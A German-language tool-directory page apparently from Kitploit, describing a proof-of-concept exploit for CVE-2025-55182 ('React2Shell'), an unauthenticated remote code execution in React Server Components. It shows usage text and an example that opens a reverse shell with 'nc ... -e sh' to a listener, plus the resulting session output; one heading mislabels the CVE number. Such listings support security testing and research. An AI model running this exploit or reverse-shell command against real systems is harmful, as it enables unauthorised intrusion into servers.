Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PoC-CVE-2025-55182 — CVE-2025-55182 (React2Shell) PoC: Unauthenticated RCE, das React 19.x und Next.js < 15.1.4 betrifft. Nutzt Sicherheitslücken im RSC Flight-Protokoll aus. | Kitploit
Tools/GitHubGitHub/masterwok/poc-cve-2025-55182
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubmasterwok/poc-cve-2025-55182

PoC-CVE-2025-55182

CVE-2025-55182 (React2Shell) PoC: Unauthenticated RCE, das React 19.x und Next.js < 15.1.4 betrifft. Nutzt Sicherheitslücken im RSC Flight-Protokoll aus.

Repository anzeigen
1vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

PoC: CVE-2026-33017

Eine Sicherheitslücke zur Remote-Codeausführung ohne Authentifizierung besteht in React Server Components Versionen 19.0.0, 19.1.0, 19.1.1 und 19.2.0 einschließlich der folgenden Pakete: react-server-dom-parcel, react-server-dom-turbopack und react-server-dom-webpack. Der anfällige Code deserialisiert unsicher Nutzdaten aus HTTP-Anfragen an Server-Function-Endpunkte.

https://nvd.nist.gov/vuln/detail/CVE-2025-55182


Verwendung

root@kitploit:~
usage: CVE-2025-55182.py [-h] --command COMMAND target

PoC-Exploit: CVE-2025-55182

positional arguments:
  target             Ziel-Hostname

options:
  -h, --help         show this help message and exit
  --command COMMAND  Befehl, der auf dem Ziel ausgeführt werden soll

Beispiel

root@kitploit:~
# Docker-Instanz erstellen
docker run -d -p 3000:3000 ihsansencan/react2shell:cve-2025-55182

# Listener starten
nc -lnvp 4444

# Exploit starten
python3 CVE-2025-55182.py http://127.0.0.1:3000/ --command "nc 192.168.1.211  4444 -e sh"

# Reverse Shell sollte im Listener eingehen
Listening on 0.0.0.0 4444
Connection received on 172.17.0.2 43911
uname -a
Linux f346806b6f59 6.17.0-20-generic #20~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Mar 19 01:28:37 UTC 2 x86_64 Linux

Dieses Projekt dient ausschließlich Bildungs- und Forschungszwecken. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch diesen Code verursacht werden.

Tool herunterladen